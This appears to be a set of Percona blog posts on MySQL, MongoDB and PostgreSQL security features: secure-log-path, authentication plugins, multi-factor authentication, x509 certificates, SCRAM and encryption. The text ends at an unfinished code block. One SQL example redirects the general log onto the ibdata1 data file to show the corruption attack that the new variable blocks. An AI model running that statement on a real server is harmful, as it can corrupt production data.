Securing Dynamic Log File Locations in MySQL

MySQL allows anybody with the SYSTEM_VARIABLES_ADMIN privilege to change the location of the general log and the slow query log while the server is running, pointing them to any location and even appending to existing files. In Percona Server for MySQL 8.0.28-19 we introduced a new system variable, secure-log-path, that can be used to restrict the location of these log files to prevent accidents or possible data corruption attacks.

When somebody with the SYSTEM_VARIABLES_ADMIN privilege changes these variables, the server runs a few sanity checks. Unfortunately, these checks are quite minimal and only verify that the specified file is writable by mysqld.

Compared to this, other variables specifying write-related file and directory names are either read-only during the runtime of the server (such as datadir, tmpdir, or log_error), or have additional security checks, for example, the FILE privilege restricted by secure-file-priv.

Without a mechanism like this, these log files can be redirected to any file writable by mysqld, such as ibdata1 or any other data file in the data directory. The server only appends to these files and deletes no data from them, but it is still possible to corrupt such files by writing unrelated log messages into them.

To fix this issue, starting with Percona Server for MySQL 8.0.28-19 we introduced a new variable, secure-log-path. This works similarly to secure-file-priv: it can be either empty (which is the default) or the name of a directory. If it is specified, the general log file and the slow query log can only be set to a file within that directory.

Similar to secure-file-priv, the server will display a warning during startup if this new variable is empty, and also if the data directory is within it.

While these two variables are similar, it is important not to point them at the same location: in most setups, users with the FILE privilege shouldn’t be able to read the log files written by mysqld using SQL commands, as that could leak potentially sensitive data. To avoid this, set the two variables to different directories.
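To sketch the effect (the directory, file names, and exact error behavior here are illustrative; like secure-file-priv, the variable itself is set at server startup):

```sql
-- my.cnf (assumed layout):
-- [mysqld]
-- secure_log_path = /var/log/mysql-logs

-- With secure-log-path set, pointing a log at a data file is rejected:
SET GLOBAL general_log_file = '/var/lib/mysql/ibdata1';
-- fails: the file is outside the secure_log_path directory

-- A file inside the allowed directory is accepted:
SET GLOBAL general_log_file = '/var/log/mysql-logs/general.log';
```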


Upgrade your Libraries: Authentication Plugin ‘caching_sha2_password’ Cannot be Loaded

For my previous blog post on the topic, I received plenty of questions about why I did not cover the caching_sha2_password plugin. This plugin is the default since MySQL 8, and all user accounts created without specifying a different authentication plugin will use it. Locally, everything works fine because the plugin is built into the MySQL server and client.

If you then connect with such a user account from a remote machine you may get an error similar to:

ERROR 2059 (HY000): Authentication plugin 'caching_sha2_password' cannot be loaded: /usr/lib64/mysql/plugin/ cannot open shared object file: No such file or directory

Unlike the situation mentioned in the other blog post, the reason for this error is not always the default authentication plugin option of the client. More often, it means that you did not upgrade your MySQL client libraries.

Client-side support for caching_sha2_password was first introduced in MySQL 5.7. If you somehow still use MySQL 5.6 or an earlier version, you will not be able to connect to MySQL using this plugin.

Some operating systems have MariaDB packages in place of MySQL.

MariaDB server does not support the caching_sha2_password plugin, but MariaDB Connector/C does support it since version 3.0.2. The plugin is not built-in and is provided as a separate library. All clients that use MariaDB Connector/C support authentication with the caching_sha2_password plugin, including the MariaDB command-line clients.

The MariaDB libmysqlclient library does not support the caching_sha2_password plugin. Therefore, if you use a client linked with this library, you will not be able to authenticate with the caching_sha2_password plugin.
Applications that connect to MySQL using different APIs, such as Python, PHP, Go, Java, and ODBC, need to use the latest versions of the connectors and database drivers. Both MySQL and MariaDB connectors support the caching_sha2_password plugin.
This also applies to Percona Toolkit.


In order to use the caching_sha2_password authentication plugin:

  • For MySQL, Percona Server for MySQL, and Percona XtraDB Cluster
    • Use client version 5.7 or newer
    • No other actions are needed: support is built-in
  • For MariaDB
    • Use a client linked with MariaDB Connector/C 3.0.2 or newer
    • Specify the plugin directory option if your client cannot find the caching_sha2_password plugin library in the default location
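If a client simply cannot be upgraded, you can check which plugin an account uses and, as a last resort, switch that account back to the legacy plugin (the account name here is illustrative):

```sql
-- Which authentication plugin does each account use?
SELECT user, host, plugin FROM mysql.user WHERE user = 'app';

-- Fallback only when the client cannot be upgraded: use the older plugin
ALTER USER 'app'@'%' IDENTIFIED WITH mysql_native_password BY 'new_password';
```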


Percona Monitoring and Management Security Threat Tool

Percona Monitoring and Management (PMM) is a multi-faceted tool that includes the Security Threat Tool which provides the ability to check your databases for potential configuration or performance problems.  And boy was I shocked to find I had problems when I installed PMM for testing.

The complete list of checks that PMM runs daily ranges from unsecured log file permissions to low cache rates, depending on the database.  PMM checks MySQL, MongoDB, and PostgreSQL instances. These checks are categorized as critical, major, or trivial depending on their respective impact, and you can silence them if the issue is chronic but has been deemed tolerable.

I installed PMM and Percona Distribution for MySQL on a test server and enabled PMM security.  On the home screen, the alert menu was instantly displayed.  

Security Alert

It is a little shocking to find your new server has potential security issues.

Yup, my test system had problems!  I clicked on the above section of the PMM home page fearful of what horrors awaited me.  

The Security Warnings

The warnings from PMM’s Security Threat Tool are clear and concise, often offering setting recommendations

There were no ‘critical’ problems, but there were two ‘major’ and three ‘trivial’ issues. The first ‘major’ problem was that master_verify_checksum is disabled.  The master_verify_checksum variable is used in replication. Since this was a test machine and not part of any replication topology, there is no real need to have a replication source verify events read from the binary log by examining checksums and stop in the case of a mismatch. By the way, master_verify_checksum is disabled by default.

The second ‘major’ issue was that the binary log files are rotated too quickly, and PMM suggested a value for this setting. Once again, for an ephemeral test system I could live with this issue, as nobody else depended on this system.

The ‘trivial’ issues were things that may not be considered trivial by all.  The first of these was the InnoDB flush method.  My test system was set up to use fsync, while PMM recommends O_DIRECT, which is usually the choice for local disks. I will not review all the options and opinions (and there are many), but it was nice to get a gentle prodding from PMM about this issue. If this test system were going to be around for a while, I would definitely change the current setting to the recommended one.

My second ‘trivial’ problem was more of a warning about a user who had DBA privileges. And the last was a recommendation to change binlog_row_image from full to minimal, which would provide better performance.  You might consider this nagging by PMM, but both are issues a DBA or a reliability engineer would gladly be reminded of.
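Out of curiosity, the settings PMM flagged on my instance can be checked and adjusted directly (a sketch; your values will depend on your server):

```sql
SHOW GLOBAL VARIABLES
  WHERE Variable_name IN ('master_verify_checksum', 'innodb_flush_method', 'binlog_row_image');

-- Acting on the binlog_row_image recommendation:
SET GLOBAL binlog_row_image = 'minimal';

-- innodb_flush_method is not dynamic; change it in my.cnf and restart the server.
```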

To enable the Security Threat Tool, select the gear icon on the left side of the main PMM display for the Configuration option, and then the second gear icon for Settings.

Config Settings

Please pick the configuration ‘gear’ icon


Then select advanced settings

Security Threat Tool

And finally, enable the Security Threat Tool. I would stick with the default values for the intervals when you begin to explore this tool.


The Percona Monitoring and Management Security Threat Tool is a handy way to gain insight into your MySQL, PostgreSQL, or MongoDB database.  It provides information that general security tools will not provide, wrapped in Percona’s easy-to-use PMM interface.  This is an open source tool that you need to have at your disposal.


MySQL 8: Multi-Factor Authentication Overview

As part of my ongoing series around MySQL 8 user administration, I’d like to cover one of the new features introduced in MySQL 8.0.27 – multi-factor authentication. Multi-factor authentication (MFA) is the use of multiple authentication values (factors) during the MySQL authentication process in order to establish identity.


MFA provides greater security compared to a single-factor authentication method, which has historically been based on simple methods such as password authentication. With MFA, additional authentication methods are enabled, such as requiring multiple passwords, or with devices such as smart cards, security keys, or biometric readers.

As of MySQL 8.0.27, it is now possible to require up to three authentication values to establish identity. In addition to the more common 2FA (two-factor authentication), MySQL can now also support 3FA (three-factor authentication) to complement the existing single-factor authentication that we’re all familiar with. You can mix and match different authentication methods in different combinations which makes MySQL’s MFA implementation very configurable to meet your particular security goals.

How It Works

The process of authentication is similar regardless of the number of factors required. When connecting to MySQL in the typical way (1FA using a password), the server invokes the authentication plugin indicated by the account definition and accepts or rejects the connection depending on whether the plugin reports success or failure.

With MFA authentication, the server follows the same basic process but will invoke the authentication plugins in the order listed in the account definition. If a plugin reports success and is the last plugin listed, the server will accept the connection. If a plugin reports success and is not the last plugin in the list, it will invoke the next plugin and move through the list until all of the plugins have been successfully processed. If any one of the plugins reports failure, the server will reject the connection.

MFA Elements

Authentication factors will commonly include:

  • Secret passwords
  • Security key (or smart card)
  • Biometric data (fingerprints, facial scan, etc)

Using a password relies on that information being kept secret on both sides of the authentication process. As we all know, however, this can be subject to compromise. It is possible for your password to fall into other hands in various ways. Someone could see you entering your password, or you could be a victim of a phishing attack. Passwords are compromised during server-side security breaches, so it is possible to lose password security even when you’re not specifically at fault. While security can certainly be improved upon by using multiple passwords, the safest method would be to utilize some of the other factor types in addition to password authentication. This will give you the best security with the least risk of compromise.

  • The number and type of implementation factors are controlled with the authentication_policy system variable. This variable places constraints on CREATE USER and ALTER USER statements with respect to multifactor authentication.
  • CREATE USER and ALTER USER have syntax enabling multiple authentication methods to be specified for new accounts, and for adding, modifying, or dropping authentication methods for an existing account. 
    • If an account uses 2FA or 3FA, the mysql.user table stores information about the additional authentication factors in the User_attributes column. 
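As a sketch of the syntax (the account name and plugin choices are illustrative, and the plugins must be available on your server):

```sql
-- 2FA: a password first, then simple LDAP
CREATE USER 'alice'@'%'
  IDENTIFIED WITH caching_sha2_password BY 'factor1-password'
  AND IDENTIFIED WITH authentication_ldap_simple
    AS 'uid=alice,ou=People,dc=example,dc=com';

-- Later, extend the existing account to 3FA
ALTER USER 'alice'@'%' ADD 3 FACTOR IDENTIFIED WITH authentication_fido;
```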

Authentication Policy

The authentication_policy system variable defines the multi-factor authentication policy. In a nutshell, this variable defines how many authentication factors accounts may have (or are required to have) and the authentication methods that can be used for each factor. 

The value of the authentication_policy variable is a list with one, two, or three comma-separated elements depending on your desired level of MFA. Each element in this list corresponds to an authentication factor and can be an authentication plugin name, an asterisk (*), empty, or missing. 

NOTE: There is one exception to this – the first element cannot be either empty or missing. 

As an example, see the following authentication_policy value which includes an asterisk, an authentication plugin name, and an empty element:

authentication_policy = '*,authentication_ldap_simple,'

  • The asterisk (*) indicates that an authentication method is required, but any method is permitted. 
  • An empty element indicates that an authentication method is optional, and any method is permitted. 
  • A missing element (no asterisk, no empty element, no authentication plugin name) indicates that an authentication method is *not* permitted. 
  • When a plugin name is specified, that authentication method is required for the respective factor when creating or modifying an account. 

The default authentication_policy value is ‘*,,’ (an asterisk, and two empty elements). This default configuration requires a first factor and optionally permits a second and third factor as well. As such, the default authentication_policy is entirely backward compatible with existing 1FA accounts but gives the added flexibility of being able to use 2FA or 3FA as well. 
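For example (a sketch; the named plugin must be installed for the value to be accepted), a policy can pin factor 1 to a specific plugin, require some second factor, and forbid a third factor by omitting the element entirely:

```sql
-- factor 1 must be caching_sha2_password, factor 2 is required but may be
-- any method, and a third factor is not permitted (element is missing)
SET PERSIST authentication_policy = 'caching_sha2_password,*';
```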

To enable authentication to the MySQL server using accounts that require multiple passwords (such as caching_sha2_password + authentication_ldap_simple, for instance), client programs have --password1, --password2, and --password3 options that permit up to three passwords to be specified. 

External Device(s) Authentication

The server-side authentication_fido plugin enables authentication using external devices. If this plugin is the only authentication plugin used by an account, it will also allow passwordless authentication. This plugin is only included in MySQL Enterprise distributions, however, and is not included in MySQL Community distributions. 

The client-side authentication_fido_client plugin is included in all distributions, including the MySQL Community distributions. This enables clients from any distribution to connect to accounts that use authentication_fido to authenticate on a server that has that plugin loaded. 

Note that multi-factor authentication can use non-FIDO MySQL authentication methods, the FIDO authentication method, or a combination of both. 


The following privileges enable users to perform certain restricted multi-factor authentication-related operations.

  • If a user has the AUTHENTICATION_POLICY_ADMIN privilege, they will not be subject to the constraints imposed by the authentication_policy system variable (see above). While the constraints are not enforced in this case, a warning is given for any statements that otherwise would not be permitted. 
  • If a user has the PASSWORDLESS_USER_ADMIN privilege, this will enable the creation of passwordless authentication accounts and replication of operations on those accounts. 

In Closing

Using multi-factor authentication can increase the security of your database systems, and MySQL 8.0.27 is bringing several powerful new options to the table with a robust MFA implementation. In future installments of this series, I’ll continue to expand on this topic as we dive deeper into the user administration and security aspects of MySQL. If you are interested in further exploring MFA in your database environment, let our Professional Services team help you implement the approach that is best suited for your requirements – we are here to help!


MySQL 8: Password Verification Policy

In keeping with my MySQL 8 user administration and security theme, I’d like to discuss the password verification-required policy introduced in MySQL 8.0.13. With this feature, it is possible to require that attempts to change an account password be verified by specifying the current password that is to be replaced.


The password verification-required policy enables DBAs to prevent users from changing a password without proving that they know the current password. When would this happen? Such changes could occur if a user walked away from a terminal session without logging out, and a malicious user uses the open session to change the original user’s MySQL password. As you can imagine, this could have disastrous consequences:

  • The original user is now unable to access MySQL until an administrator can reset the account password. 
  • The malicious user can access MySQL until a password reset can be implemented, compromising any data the original user had access to. 

Per-User Settings

Password-verification policy can be established globally, and individual user accounts can be set to either defer to the global policy or override the global policy with specific per-account behavior. This setting is established by the PASSWORD REQUIRE option of CREATE USER and ALTER USER statements. 

  • If the account setting is PASSWORD REQUIRE CURRENT, then password changes must specify the current password. 
  • If the account setting is PASSWORD REQUIRE CURRENT OPTIONAL, then the user can optionally supply the current password but it isn’t required for a password change.
  • If the account setting is PASSWORD REQUIRE CURRENT DEFAULT, then the global password_require_current system variable determines the verification-required policy for the account: 
    • Password changes must specify the current password if password_require_current system variable is enabled. 
    •  Password changes may optionally specify the current password if password_require_current system variable is disabled. 

If the account setting is not PASSWORD REQUIRE CURRENT DEFAULT, the account setting takes precedence over the global policy established by the password_require_current system variable. Otherwise, the account defers to the password_require_current setting. 

Password verification is optional by default: the password_require_current system variable is disabled, and accounts created with no PASSWORD REQUIRE option default to PASSWORD REQUIRE CURRENT DEFAULT.

To see how per-account user settings interact with password_require_current system variable values to determine the account password verification-required policy, see below:


Per-Account Setting                 | password_require_current | Password Changes Require Current Password?
PASSWORD REQUIRE CURRENT            | ON                       | Yes
PASSWORD REQUIRE CURRENT            | OFF                      | Yes
PASSWORD REQUIRE CURRENT OPTIONAL   | ON                       | No
PASSWORD REQUIRE CURRENT OPTIONAL   | OFF                      | No
PASSWORD REQUIRE CURRENT DEFAULT    | ON                       | Yes
PASSWORD REQUIRE CURRENT DEFAULT    | OFF                      | No

For example, to implement a per-user requirement that the current password must be entered to change the password for a specific user, a CREATE USER statement such as the following (the account name is illustrative) will accomplish this:

CREATE USER 'appuser'@'localhost' PASSWORD REQUIRE CURRENT;

The ALTER USER equivalent would be:

ALTER USER 'appuser'@'localhost' PASSWORD REQUIRE CURRENT;

This per-user verification policy overrides the global policy for all accounts specified. 

Global Settings

If you prefer to establish a global password-verification policy, change the password_require_current system variable from its disabled default. As an example, to establish a global policy that password changes must specify the current password, set the following in the configuration file:

password_require_current = ON

You can also set this at runtime with the SET PERSIST statement within a running instance:

mysql> SET PERSIST password_require_current = ON;

This sets a value for the running MySQL instance and saves it so it carries over to subsequent server restarts. To change the value for the running instance without having it persist across restarts, use the GLOBAL keyword instead of PERSIST.

Keep in mind that any per-user settings will override the global setting. This allows you to tailor a custom authentication scenario based on your use case. 


Privileged users can change any account password without specifying the current password, regardless of the verification-required policy. A privileged user is any user with the global CREATE USER privilege or the UPDATE privilege for the mysql system database. 

Wrapping Up

MySQL 8 has made great strides in bolstering user administration and user security. While we often take for granted something as simple as requiring the current password before a password change, using this option in concert with other MySQL 8 security features builds a secure and easily administered database environment that hasn’t been possible historically without relying on additional plugins or custom solutions.


Authenticating Your Clients to MongoDB on Kubernetes Using x509 Certificates

Managing database users and their passwords can be a hassle; sometimes they even sit hardcoded in various configuration files. Using certificates can help you avoid the toil of managing, rotating, and securing user passwords, so let’s see how to set up x509 certificate authentication with the Percona Server for MongoDB Operator and cert-manager.

cert-manager is our recommended way to manage TLS certificates on Kubernetes clusters. The operator is already integrated with it to generate certificates for TLS and cluster member authentication. We’re going to leverage cert-manager APIs to generate valid certificates for MongoDB clients.

There are rules to follow to have a valid certificate for user authentication:

  1. A single Certificate Authority (CA) MUST sign all certificates.
  2. The certificate’s subject MUST be unique.
  3. The certificate MUST NOT be expired.

For the complete requirements, check the MongoDB docs.

Creating Valid Certificates for Clients

Let’s check our current certificates:

$ kubectl get cert
NAME                      READY   SECRET                    AGE
cluster1-ssl              True    cluster1-ssl              17h
cluster1-ssl-internal     True    cluster1-ssl-internal     17h

The operator configures MongoDB nodes to use “cluster1-ssl-internal” as the certificate authority. We’re going to use it to sign the client certificates to conform to Rule 1.

First, we need to create an Issuer:

$ kubectl apply -f - <<EOF
apiVersion: cert-manager.io/v1
kind: Issuer
metadata:
  name: cluster1-psmdb-x509-ca
spec:
  ca:
    secretName: cluster1-ssl-internal
EOF

Then, our certificate:

$ kubectl apply -f - <<EOF
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
  name: cluster1-psmdb-egegunes
spec:
  secretName: cluster1-psmdb-egegunes
  isCA: false
  commonName: egegunes
  subject:
    organizations:
      - percona
    organizationalUnits:
      - cloud
  usages:
    - digital signature
    - client auth
  issuerRef:
    name: cluster1-psmdb-x509-ca
    kind: Issuer
EOF

The “usages” field is important; you shouldn’t touch its values. You can change the “subject” and “commonName” fields as you wish. They’re going to construct the Distinguished Name (DN), and the DN will be the username.

$ kubectl get secret cluster1-psmdb-egegunes -o yaml \
    | yq3 r - 'data."tls.crt"' \
    | base64 -d \
    | openssl x509 -subject -noout

subject=O = percona, OU = cloud, CN = egegunes

Let’s create the user:

rs0:PRIMARY> db.getSiblingDB("$external").runCommand({
   createUser: "CN=egegunes,OU=cloud,O=percona",
   roles: [{ role: 'readWrite', db: 'test' }]
})
{
        "ok" : 1,
        "$clusterTime" : {
                "clusterTime" : Timestamp(1643099623, 3),
                "signature" : {
                        "hash" : BinData(0,"EdPrmPJqfgRpMEZwGMeKNLdCe10="),
                        "keyId" : NumberLong("7056790236952526853")
                }
        },
        "operationTime" : Timestamp(1643099623, 3)
}

We’re creating the user in the “$external” database; you need to use “$external” as your authentication source. Note that we’re reversing the order of the subject fields, which is important.

Authenticating With the Certificate

I have created a simple Go application to show how you can use x509 certificates to authenticate. It’s redacted here for brevity:

// ca.crt is mounted from secret/cluster1-ssl
caFilePath := "/etc/mongodb-ssl/ca.crt"

// tls.pem consists of tls.key and tls.crt; they're mounted from secret/cluster1-psmdb-egegunes
certKeyFilePath := "/tmp/tls.pem"

endpoint := "cluster1-rs0.psmdb.svc.cluster.local"

// build the connection string shown in the log output below
uri := fmt.Sprintf(
        "mongodb+srv://%s/?tlsCAFile=%s&tlsCertificateKeyFile=%s",
        endpoint, caFilePath, certKeyFilePath,
)

credential := options.Credential{
        AuthMechanism: "MONGODB-X509",
        AuthSource:    "$external",
}

opts := options.Client().SetAuth(credential).ApplyURI(uri)

client, _ := mongo.Connect(ctx, opts)

The important part is using “MONGODB-X509” as the authentication mechanism. We also need to pass the CA and client certificate in the MongoDB URI.

$ kubectl logs psmdb-x509-tester-688c989567-rmgxv
2022/01/25 07:50:09 Connecting to database
2022/01/25 07:50:09 URI: mongodb+srv://cluster1-rs0.psmdb.svc.cluster.local/?tlsCAFile=/etc/mongodb-ssl/ca.crt&tlsCertificateKeyFile=/tmp/tls.pem
2022/01/25 07:50:09 Username: O=percona,OU=cloud,CN=egegunes
2022/01/25 07:50:09 Connected to database
2022/01/25 07:50:09 Successful ping

You can see the complete example in this repository. If you have any questions, please add a comment or create a topic in the Percona Forums.


PostgreSQL 14 and Recent SCRAM Authentication Changes – Should I Migrate to SCRAM?

PostgreSQL Migrate to SCRAM

Recently, a few PostgreSQL users reported that they got connection failures after switching to PostgreSQL 14.

“Why do I get the error ‘FATAL: password authentication failed for user’ in the new server?” has become one of the most intriguing questions.

At least in one case, it was a bit of a surprise that the application message was as follows:

FATAL: Connection to database failed: connection to server at “localhost” (::1), port 5432 failed: fe_sendauth: no password supplied

The reason for these errors is that the default password encryption method changed to SCRAM authentication in new versions of PostgreSQL. Even though the last error appears to have nothing directly to do with SCRAM, it does: a post-installation script failed because it was looking for “md5”.

SCRAM authentication is not something new in PostgreSQL. It has been there from PostgreSQL 10 onwards but never affected DBA life in general because it was never the default; it was an opt-in feature enabled by explicitly changing the default settings. Those who opt in generally understand it and do it intentionally, and it has never been known to cause any problems. The PostgreSQL community was reluctant to make it the prime method for years because many client/application libraries were not ready for SCRAM authentication.

But that is changing in PostgreSQL 14. With PostgreSQL 9.6 going out of support, the landscape is changing. Now we expect all old client libraries to get upgraded and SCRAM authentication is becoming the prime password authentication method. But, those who are completely unaware are going to be greeted with a surprise one day or another. The purpose of this post is to create a quick awareness for those who are not yet, and address some of the commonly asked questions.

What is SCRAM Authentication?

In simple words, the database client and the server prove and convince each other that they know the password without exchanging the password or the password hash. Yes, this is possible, by doing salted challenges and responses as specified by SCRAM-SHA-256 (RFC 7677). This way of storing, communicating, and verifying passwords makes it very hard to break a password.

This method is more resistant to:

  • Dictionary attacks
  • Replay attacks
  • Stolen hashes

Overall it becomes very hard to break a password-based authentication.
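The key derivation behind this can be sketched with Python’s standard library (illustrative only, following the RFC 5802/7677 building blocks; this is not PostgreSQL’s internal code):

```python
import hashlib
import hmac
import os

def scram_sha256_keys(password: str, salt: bytes, iterations: int = 4096):
    # SaltedPassword = PBKDF2-HMAC-SHA-256(password, salt, iterations)
    salted = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    client_key = hmac.new(salted, b"Client Key", hashlib.sha256).digest()
    stored_key = hashlib.sha256(client_key).digest()  # the server stores this, not the password
    server_key = hmac.new(salted, b"Server Key", hashlib.sha256).digest()
    return stored_key, server_key

stored, server = scram_sha256_keys("s3cret", os.urandom(16))
# The server can verify a client's proof using StoredKey and prove its own
# identity using ServerKey, so the password itself never crosses the wire.
```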

What Has Changed Over Time?

Channel Binding

Authentication is only one part of secured communication. After authentication, a rogue server in the middle could potentially take over and fool the client connection. PostgreSQL 11 introduced SCRAM-SHA-256-PLUS, which supports channel binding. This makes sure that no rogue server is acting as the real server or performing a man-in-the-middle attack.

From PostgreSQL 13 onwards, a client can request and even insist on channel binding.

For example:

psql -U postgres -h c76pri channel_binding=prefer
psql -U postgres -h c76pri channel_binding=require

Channel binding works over SSL/TLS, so SSL/TLS configuration is mandatory for channel binding to work.

Setting Password Encryption

md5 was the only available option for password encryption before PostgreSQL 10, so PostgreSQL allowed a setting that merely indicated “password encryption is required,” which defaulted to md5.

-- Up to PG 13
postgres=# set password_encryption TO ON;

Due to the same reason, the above statement was effectively the same as:

postgres=# set password_encryption TO MD5;

We could even use “true”, “1”, or “yes” instead of “on” as equivalent values.

But now we have multiple encryption methods and “ON” doesn’t really convey what we really want. So from PostgreSQL 14 onwards, the system expects us to specify the encryption method.

postgres=# set password_encryption TO 'scram-sha-256';

postgres=# set password_encryption TO 'md5';

Any attempt to use “on”, “true”, or “yes” will be rejected with an error.

-- From PG 14
postgres=# set password_encryption TO 'on';
ERROR:  invalid value for parameter "password_encryption": "on"
HINT:  Available values: md5, scram-sha-256.

So please check your scripts and make sure that they don’t have the old way of “enabling” encryption.

Some Frequently Asked Questions

  1. Does my logical backup and restore get affected?
    Logical backup and restore of PostgreSQL globals (pg_dumpall) won’t affect SCRAM authentication; the same password should work after the restore. In fact, it is interesting to recall that SCRAM authentication is more resilient to changes. For example, if we rename a user, the old MD5 password won’t work anymore, because PostgreSQL uses the username when generating the MD5 hash.

    postgres=# ALTER USER jobin1 RENAME TO jobin;
    NOTICE:  MD5 password cleared because of role rename

    As the NOTICE indicates, the password hash in pg_authid is cleared because the old one is no longer valid. But this is not the case with SCRAM authentication, as we can rename users without affecting the password.

    postgres=# ALTER USER jobin RENAME TO jobin1;
  2. The existing/old method of encryption (md5) was a big vulnerability. Was there a big risk?
    This worry mainly comes from the name “MD5,” which sounds far too weak for modern hardware. But the way PostgreSQL uses MD5 is different: it hashes not just the password but the username as well. Additionally, it is communicated over the wire only after preparing a hash with a random salt provided by the server. Effectively, what is communicated differs from the stored password hash, so it is not too vulnerable, though it remains prone to dictionary attacks and leaked username/password-hash problems.
  3. Does the new SCRAM authentication add complexity? Is my connection request going to take more time?
    The SCRAM wire protocol is very efficient and not known to cause any degradation in connection time. Moreover, compared to the other overheads of server-side connection management, the overhead created by SCRAM is negligible.
  4. Is it mandatory to use SCRAM authentication from PostgreSQL 14 and force all my user accounts to switch to it?
    Definitely not; only the defaults have changed. The old md5 method is still valid and works great, and if access to the PostgreSQL environment is restricted by firewall/HBA rules, there is already less risk in using md5.
  5. Why do I get the “FATAL: password authentication failed for user” error when I switch to PostgreSQL 14?
    The most probable reason is the pg_hba.conf entries. If we specify “md5” as the authentication method, PostgreSQL will allow SCRAM authentication as well, but the reverse won’t work. When you created the PostgreSQL 14 environment, it most probably got “scram-sha-256” as the authentication method; in some PostgreSQL packages, the installation script does this for you automatically. If authentication works from the PostgreSQL client tools but not from the application, please check the driver version and the scope for an upgrade.
  6. Why do I get other types of authentication errors?
    The most probable reasons are the post-installation scripts. It is a regular practice in many organizations to use DevOps tools (Ansible/Chef) or even shell scripts for post-installation customizations. Many of those do a range of things involving steps like set password_encryption TO ON; or modifications to pg_hba.conf using sed, which will fail if they try to modify an entry that is no longer there.
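To make the md5 discussion in question 2 concrete: the verifier PostgreSQL stores for md5 authentication is the MD5 of the password concatenated with the username, prefixed with "md5" (the usernames below are just examples):

```python
import hashlib

def pg_md5_verifier(password: str, username: str) -> str:
    """Build the value PostgreSQL stores in pg_authid for md5 auth:
    'md5' + md5(password || username). The username acts as a fixed,
    predictable salt, which is why this remains prone to dictionary
    attacks once the stored hash leaks."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()

# The same password yields a different stored hash per user:
print(pg_md5_verifier("secret", "jobin"))
print(pg_md5_verifier("secret", "alice"))
```

What travels over the wire during authentication is a further hash of this verifier combined with a random server-supplied salt, which is why the stored hash itself is never transmitted.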

Why Should I Care and What To Do

Anything starting from automation/deployment scripts, tools, application connections, and connection poolers could potentially break. One of the major arguments for delaying this change till PostgreSQL 14 is that the oldest supported version (9.6) is going out of support soon. So this is the right time to inspect your environments to see if any of those environments have old PostgreSQL libraries (9.6 or older) and have a plan for the upgrade, as the old version PostgreSQL libraries cannot handle SCRAM negotiations.

In summary, having a good plan to migrate will help, even though it is not urgent.

    1. Inspect the environments and application drivers to see whether any of them are still using old versions of PostgreSQL client libraries and upgrade them wherever required.
      Encourage and drive the upgrade of client libraries with a timeline.
    2. If the existing environment is using md5, encourage users to switch to SCRAM authentication.
      Remember that the authentication method mentioned as “md5” in pg_hba.conf will continue to work for both SCRAM and MD5 authentication in PostgreSQL 14 also.
    3. Take every opportunity to test and migrate automation, connection poolers, and other infrastructure to SCRAM authentication.
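For step 2, transitional pg_hba.conf entries might look like the following sketch (the network range is an example):

```
# "md5" here accepts both MD5 and SCRAM verifiers, so it is a safe
# transitional setting while passwords are being re-hashed:
host  all  all  10.0.0.0/24  md5

# Once every account has a SCRAM verifier, tighten to SCRAM only:
host  all  all  10.0.0.0/24  scram-sha-256
```

Reload the server configuration after editing pg_hba.conf for the change to take effect.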

By changing the default authentication, the PostgreSQL community is showing a clear direction about the future.

Percona Distribution for PostgreSQL provides the best and most critical enterprise components from the open-source community, in a single distribution, designed and tested to work together.

Download Percona Distribution for PostgreSQL Today!


Percona Server for MySQL Encryption Options and Choices

Security will always be a main focal point of a company’s data. A common question I get from clients is, “How do I enable encryption?” Like every good consulting answer, it depends on what you are trying to encrypt. This post is a high-level summary of the different options available for encryption in Percona Server for MySQL.

Different certifications require different levels of encryption. For example, PCI requires encryption of data both at rest and in transit. Here are the main facets of encryption for MySQL:

  • Data at Rest
    • Full disk encryption (at the OS level)
    • Transparent Data Encryption – TDE
    • Column/field-level encryption
  • Data in Transit
    • TLS Connections

Data at Rest

Data at rest is frequently the most asked about part of encryption. Data at rest encryption has multiple components, but at the core is simply ensuring that the data is encrypted at some level when stored. Here are the primary ways we can look at the encryption of data at rest.

Full Disk Encryption (FDE)

This is the easiest and most portable method of encrypting data at rest. When using full disk encryption, the main goal is to protect the hard drives in the event they are compromised. If a disk is removed from the server or the server is removed from a rack, the disk isn’t readable without the encryption key.

This can be managed in different ways, but the infrastructure team generally handles it. Frequently, enterprises already have disk encryption as part of the infrastructure stack. This makes FDE a relatively easy option for data at rest encryption. It also has the advantage of being portable. Regardless of which database technology you use, the encryption is managed at the server level.

The main disadvantage of FDE is that when the server is running, and the disk is mounted, all data is readable. It offers no protection against an attack on a running server once mounted.

Transparent Data Encryption (TDE)

Moving up the chain, the next option for data at rest encryption is Transparent Data Encryption (TDE). In contrast to FDE, this method encrypts the actual InnoDB data and log files. The main difference with database TDE is that the encryption is managed through the database, not at the server level. With this approach, the data and log files are encrypted on disk by the database. As data is read by MySQL/queries, the encrypted pages are read from disk and decrypted to be loaded into InnoDB’s buffer pool for execution.

For this method, the encryption keys are managed either through local files or a remote KMS (such as HashiCorp Vault) via a keyring plugin. While this approach helps prevent an OS user from simply copying data files, the decrypted data does reside in memory, which could be susceptible to a clever attacker; we must rely on OS-level memory protections for further assurance. It also shifts a level of complexity for key management and backups onto the DBA team.
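As a sketch, TDE with a local keyring file might be configured along these lines in my.cnf (the paths are examples; a remote KMS setup would use the keyring_vault plugin instead):

```
[mysqld]
# Load the keyring plugin early, before InnoDB initializes
early-plugin-load = keyring_file.so
# Location of the local key file (example path)
keyring_file_data = /var/lib/mysql-keyring/keyring
```

With the keyring in place, an individual InnoDB table can then be encrypted with ALTER TABLE t ENCRYPTION='Y'.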

Column Level Encryption

While the prior methods of at-rest encryption can help to meet various compliance requirements, both are limited when it comes to a running system: if a running system is compromised, the stored data is fully readable. Column-level encryption protects selected data even on a running system; without the key, the data in the encrypted column is unreadable.

While this method protects selected data in a running system, it often requires application-level changes. Inserts are done with a specific encryption function (AES_ENCRYPT in MySQL, for example). To read the data, AES_DECRYPT with the specified key is required. The main risk with this approach is sending the plaintext values as part of the query. This can be sniffed if not using TLS or potentially leaked through log files. The better approach is to encrypt the data in the application BEFORE sending it to MySQL to ensure no plaintext is ever passed between systems.

In some cases, you can use a shared key for the entire application. Other approaches would be to use an envelope method and store a unique key alongside each encrypted value (protected by a separate master key).

Either way, it is important to understand one of the primary downsides to this approach – indexes and sort order can and will be impacted. For example, if you are encrypting the SSN number, you won’t be able to sort by SSN within MySQL. You would be able to look up a row using the SSN number but would need to pass the encrypted value.
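As an illustration of the function-based approach (the customers table and key shown here are hypothetical, and passing the key in SQL text is exactly the leakage risk described above):

```sql
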